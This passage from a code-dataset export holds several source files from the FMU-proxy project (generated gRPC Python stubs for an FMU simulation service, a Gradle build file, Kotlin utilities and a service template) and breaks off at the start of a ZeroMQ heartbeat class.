'/no.mechatronics.sfi.fmuproxy.grpc.FmuService/IsTerminated',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.Bool.FromString,\n )\n self.CanGetAndSetFMUstate = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/CanGetAndSetFMUstate',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.Bool.FromString,\n )\n self.Init = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Init',\n request_serializer=definitions__pb2.InitRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.Step = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Step',\n request_serializer=definitions__pb2.StepRequest.SerializeToString,\n response_deserializer=definitions__pb2.StepResult.FromString,\n )\n self.Terminate = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Terminate',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.Reset = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/Reset',\n request_serializer=definitions__pb2.UInt.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.ReadInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadInteger',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.IntRead.FromString,\n )\n self.ReadReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadReal',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.RealRead.FromString,\n )\n self.ReadString = 
channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadString',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.StrRead.FromString,\n )\n self.ReadBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/ReadBoolean',\n request_serializer=definitions__pb2.ReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.BoolRead.FromString,\n )\n self.BulkReadInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadInteger',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.IntListRead.FromString,\n )\n self.BulkReadReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadReal',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.RealListRead.FromString,\n )\n self.BulkReadString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadString',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.StrListRead.FromString,\n )\n self.BulkReadBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkReadBoolean',\n request_serializer=definitions__pb2.BulkReadRequest.SerializeToString,\n response_deserializer=definitions__pb2.BoolListRead.FromString,\n )\n self.WriteInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteInteger',\n request_serializer=definitions__pb2.WriteIntRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.WriteReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteReal',\n request_serializer=definitions__pb2.WriteRealRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.WriteString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteString',\n request_serializer=definitions__pb2.WriteStrRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.WriteBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/WriteBoolean',\n request_serializer=definitions__pb2.WriteBoolRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteInteger = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteInteger',\n request_serializer=definitions__pb2.BulkWriteIntRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteReal = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteReal',\n request_serializer=definitions__pb2.BulkWriteRealRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteString = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteString',\n request_serializer=definitions__pb2.BulkWriteStrRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n self.BulkWriteBoolean = channel.unary_unary(\n '/no.mechatronics.sfi.fmuproxy.grpc.FmuService/BulkWriteBoolean',\n request_serializer=definitions__pb2.BulkWriteBoolRequest.SerializeToString,\n response_deserializer=definitions__pb2.StatusResponse.FromString,\n )\n\n\nclass 
FmuServiceServicer(object):\n # missing associated documentation comment in .proto file\n pass\n\n def GetModelDescriptionXml(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetModelDescription(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateInstanceFromCS(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateInstanceFromME(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetCurrentTime(self, request, context):\n \"\"\"instance methods\n\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def IsTerminated(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CanGetAndSetFMUstate(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Init(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Step(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Terminate(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Reset(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def 
ReadString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ReadBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkReadBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteBoolean(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteInteger(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteReal(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteString(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def BulkWriteBoolean(self, request, context):\n # missing associated 
documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_FmuServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetModelDescriptionXml': grpc.unary_unary_rpc_method_handler(\n servicer.GetModelDescriptionXml,\n request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n response_serializer=definitions__pb2.Str.SerializeToString,\n ),\n 'GetModelDescription': grpc.unary_unary_rpc_method_handler(\n servicer.GetModelDescription,\n request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n response_serializer=definitions__pb2.ModelDescription.SerializeToString,\n ),\n 'CreateInstanceFromCS': grpc.unary_unary_rpc_method_handler(\n servicer.CreateInstanceFromCS,\n request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n response_serializer=definitions__pb2.UInt.SerializeToString,\n ),\n 'CreateInstanceFromME': grpc.unary_unary_rpc_method_handler(\n servicer.CreateInstanceFromME,\n request_deserializer=definitions__pb2.Solver.FromString,\n response_serializer=definitions__pb2.UInt.SerializeToString,\n ),\n 'GetCurrentTime': grpc.unary_unary_rpc_method_handler(\n servicer.GetCurrentTime,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.Real.SerializeToString,\n ),\n 'IsTerminated': grpc.unary_unary_rpc_method_handler(\n servicer.IsTerminated,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.Bool.SerializeToString,\n ),\n 'CanGetAndSetFMUstate': grpc.unary_unary_rpc_method_handler(\n servicer.CanGetAndSetFMUstate,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.Bool.SerializeToString,\n ),\n 'Init': grpc.unary_unary_rpc_method_handler(\n servicer.Init,\n request_deserializer=definitions__pb2.InitRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'Step': grpc.unary_unary_rpc_method_handler(\n servicer.Step,\n request_deserializer=definitions__pb2.StepRequest.FromString,\n response_serializer=definitions__pb2.StepResult.SerializeToString,\n ),\n 'Terminate': grpc.unary_unary_rpc_method_handler(\n servicer.Terminate,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'Reset': grpc.unary_unary_rpc_method_handler(\n servicer.Reset,\n request_deserializer=definitions__pb2.UInt.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'ReadInteger': grpc.unary_unary_rpc_method_handler(\n servicer.ReadInteger,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.IntRead.SerializeToString,\n ),\n 'ReadReal': grpc.unary_unary_rpc_method_handler(\n servicer.ReadReal,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.RealRead.SerializeToString,\n ),\n 'ReadString': grpc.unary_unary_rpc_method_handler(\n servicer.ReadString,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.StrRead.SerializeToString,\n ),\n 'ReadBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.ReadBoolean,\n request_deserializer=definitions__pb2.ReadRequest.FromString,\n response_serializer=definitions__pb2.BoolRead.SerializeToString,\n ),\n 
'BulkReadInteger': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadInteger,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.IntListRead.SerializeToString,\n ),\n 'BulkReadReal': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadReal,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.RealListRead.SerializeToString,\n ),\n 'BulkReadString': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadString,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.StrListRead.SerializeToString,\n ),\n 'BulkReadBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.BulkReadBoolean,\n request_deserializer=definitions__pb2.BulkReadRequest.FromString,\n response_serializer=definitions__pb2.BoolListRead.SerializeToString,\n ),\n 'WriteInteger': grpc.unary_unary_rpc_method_handler(\n servicer.WriteInteger,\n request_deserializer=definitions__pb2.WriteIntRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'WriteReal': grpc.unary_unary_rpc_method_handler(\n servicer.WriteReal,\n request_deserializer=definitions__pb2.WriteRealRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'WriteString': grpc.unary_unary_rpc_method_handler(\n servicer.WriteString,\n request_deserializer=definitions__pb2.WriteStrRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'WriteBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.WriteBoolean,\n request_deserializer=definitions__pb2.WriteBoolRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteInteger': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteInteger,\n request_deserializer=definitions__pb2.BulkWriteIntRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteReal': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteReal,\n request_deserializer=definitions__pb2.BulkWriteRealRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteString': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteString,\n request_deserializer=definitions__pb2.BulkWriteStrRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n 'BulkWriteBoolean': grpc.unary_unary_rpc_method_handler(\n servicer.BulkWriteBoolean,\n request_deserializer=definitions__pb2.BulkWriteBoolRequest.FromString,\n response_serializer=definitions__pb2.StatusResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'no.mechatronics.sfi.fmuproxy.grpc.FmuService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n" }, { "alpha_fraction": 0.6505628228187561, "alphanum_fraction": 0.6805816292762756, "avg_line_length": 24.082353591918945, "blob_id": "42a2f71545bab44d210bd790c22166e13b8a8d43", "content_id": "50445e1854586e7f547c6e6120dbee401fcda47f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 2132, "license_type": "permissive", "max_line_length": 120, "num_lines": 85, "path": "/java/FMU-proxy/web/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "buildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n 
classpath 'org.akhikhl.gretty:gretty:2.0.0'\n }\n}\n\next.jetty94Version = '9.4.9.v20180320'\n\napply plugin: 'kotlin'\napply plugin: 'war'\napply plugin: 'org.akhikhl.gretty'\n\n\ndef snapshot = true\ndef fmi4j_version = snapshot ? fmi4j_snapshot_version : fmi4j_stable_version\n\ndependencies {\n\n providedCompile 'javax.servlet:servlet-api:2.2'\n providedCompile 'javax.servlet.jsp:jsp-api:2.2'\n providedCompile 'javax.enterprise:cdi-api:2.0'\n\n compile group: 'com.sun.faces', name: 'jsf-api', version: '2.2.17'\n runtime group: 'com.sun.faces', name: 'jsf-impl', version: '2.2.17'\n\n compile group: 'org.primefaces', name: 'primefaces', version: '6.2'\n\n compile group: 'com.google.code.gson', name: 'gson', version: '2.8.4'\n compile group: 'org.zeromq', name: 'jeromq', version: '0.4.3'\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtime group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n compile group: 'no.mechatronics.sfi.fmi4j', name: 'fmi-modeldescription', version: fmi4j_version, changing: snapshot\n\n}\n\ngretty {\n servletContainer = \"jetty9.4\"\n httpEnabled = true\n httpPort = 8080\n contextPath = \"/fmu-proxy\"\n logDir = \"$projectDir/logs\"\n}\n\ntask copyAvro(type: Copy) {\n\n from('../rpc-definitions/src/main/avro')\n into('src/main/webapp/resources/schemas/avro')\n include('*.avdl')\n\n}\n\ntask copyThrift(type: Copy) {\n\n from('../rpc-definitions/src/main/thrift')\n into('src/main/webapp/resources/schemas/thrift')\n include('*.thrift')\n\n}\n\ntask copyProto(type: Copy) {\n\n from('../rpc-definitions/src/main/proto')\n into('src/main/webapp/resources/schemas/proto')\n include('*.proto')\n\n}\n\ntask copyProtoZip(type: Zip) {\n\n from '../rpc-definitions/src/main/proto'\n include '*'\n archiveName 'fmu-proxy-generic-proto.zip'\n destinationDir(file('src/main/webapp/resources/schemas/proto/'))\n}\n\ncompileKotlin.dependsOn(copyAvro)\ncompileKotlin.dependsOn(copyThrift)\ncompileKotlin.dependsOn(copyProto)\ncompileKotlin.dependsOn(copyProtoZip)\n" }, { "alpha_fraction": 0.6843658089637756, "alphanum_fraction": 0.6890855431556702, "avg_line_length": 31.615385055541992, "blob_id": "ee8a0ad036f8c8e3fde1a89e3ecc08e7b374ab24", "content_id": "6a5f9ba4e41541e159e7c6e91183f0f4509c4369", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1695, "license_type": "permissive", "max_line_length": 81, "num_lines": 52, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/utils/FileFuture.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND 
NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.utils\n\nimport java.io.File\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nclass FileFuture (\n val name: String,\n val text: String\n) {\n\n @JvmOverloads\n fun create(dir: File, fileName: String = name) : File {\n return File(dir, fileName).also {file ->\n if (!dir.exists()) {\n dir.mkdirs()\n }\n file.writeText(text)\n }\n }\n\n override fun toString(): String {\n return \"FileFuture(name='$name', text='$text')\"\n }\n\n}" }, { "alpha_fraction": 0.7076205015182495, "alphanum_fraction": 0.7122861742973328, "avg_line_length": 25.26530647277832, "blob_id": "9a968b1a59ce57f3a292072295b6d7d2b013f788", "content_id": "225a345cb95b32b7f36255dfa8e750713a944777", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1286, "license_type": "permissive", "max_line_length": 75, "num_lines": 49, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/solver/solver.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.solver\n\nimport com.google.gson.Gson\nimport com.google.gson.GsonBuilder\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.apache.commons.math3.ode.nonstiff.ClassicalRungeKuttaIntegrator\nimport org.apache.commons.math3.ode.nonstiff.EulerIntegrator\n\nprivate const val STEP_SIZE = \"step_size\"\n\nprivate val gson: Gson by lazy {\n GsonBuilder().create()\n}\n\nfun parseIntegrator(name: String, json: String): FirstOrderIntegrator? {\n return when(name.toLowerCase()) {\n \"euler\" -> eulerFromJson(json)\n \"rk4\" -> rk4FromJson(json)\n else -> null\n }\n}\n\nprivate fun eulerFromJson(json: String): EulerIntegrator? {\n\n @Suppress(\"UNCHECKED_CAST\")\n val settings = Gson().fromJson(json, Map::class.java) as Map<String, *>\n\n if (STEP_SIZE !in settings) {\n return null\n }\n\n val stepSize = settings[STEP_SIZE] as Double\n return EulerIntegrator(stepSize)\n\n}\n\nprivate fun rk4FromJson(json: String): ClassicalRungeKuttaIntegrator? 
{\n\n @Suppress(\"UNCHECKED_CAST\")\n val settings = gson.fromJson(json, Map::class.java) as Map<String, *>\n\n if (STEP_SIZE !in settings) {\n return null\n }\n\n val stepSize = settings[STEP_SIZE] as Double\n return ClassicalRungeKuttaIntegrator(stepSize)\n\n}" }, { "alpha_fraction": 0.7423007488250732, "alphanum_fraction": 0.7472826242446899, "avg_line_length": 37.034481048583984, "blob_id": "8ace9022036f92c1507994b8f18717d1bd34f3b2", "content_id": "b62b4758da16e341556353b615e630afb778726d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2208, "license_type": "permissive", "max_line_length": 95, "num_lines": 58, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/resources/templates/server/Service.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc\n\nimport io.grpc.BindableService\nimport io.grpc.stub.StreamObserver\n\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\n\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.grpc.services.GrpcFmuService\n\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\nclass {{fmuName}}Service: {{fmuName}}ServiceGrpc.{{fmuName}}ServiceImplBase(), GrpcFmuService {\n\n {{dynamicMethods}}\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger({{fmuName}}Service::class.java.simpleName)\n }\n\n}\n\ninternal fun FmiStatus.protoType(): Proto.Status {\n return when (this) {\n FmiStatus.OK -> Proto.Status.OK_STATUS\n FmiStatus.Warning -> Proto.Status.WARNING_STATUS\n FmiStatus.Discard -> Proto.Status.DISCARD_STATUS\n FmiStatus.Error -> Proto.Status.ERROR_STATUS\n FmiStatus.Fatal -> Proto.Status.FATAL_STATUS\n FmiStatus.Pending -> Proto.Status.PENDING_STATUS\n FmiStatus.NONE -> Proto.Status.UNRECOGNIZED\n }\n}\n\n\n" }, { "alpha_fraction": 0.5336081385612488, "alphanum_fraction": 0.5396322011947632, "avg_line_length": 32.721923828125, "blob_id": "dd8cc8ee6fdbe130f6d009d86b77f653c746ab59", "content_id": "f6a2aaa05b9981ed88f6c475cb863d12a1137ad0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 6308, "license_type": "permissive", "max_line_length": 129, "num_lines": 187, "path": 
"/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/heartbeat/Heartbeat.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.heartbeat\n\nimport com.google.gson.Gson\nimport com.google.gson.GsonBuilder\nimport no.mechatronics.sfi.fmuproxy.fmu.RemoteFmu\nimport no.mechatronics.sfi.fmuproxy.net.SimpleSocketAddress\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport org.zeromq.ZContext\nimport org.zeromq.ZFrame\nimport org.zeromq.ZMQ\nimport org.zeromq.ZMsg\nimport java.io.Closeable\n\nprivate const val HEARTBEAT_LIVENESS = 3L // 3-5 is reasonable\nprivate const val HEARTBEAT_INTERVAL = 1000L // msecs\nprivate const val INTERVAL_INIT = 1000L // Initial reconnect\nprivate const val INTERVAL_MAX = 32000L // After exponential backoff\n\nprivate const val PPP_READY = \"\\u0001\"// Signals worker is ready\nprivate const val PPP_HEARTBEAT = \"\\u0002\"// Signals worker heartbeat\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\ninternal class Heartbeat(\n private val remoteAddress: SimpleSocketAddress,\n private val remoteFmu: RemoteFmu\n): Closeable {\n\n private var inner: InnerClass? 
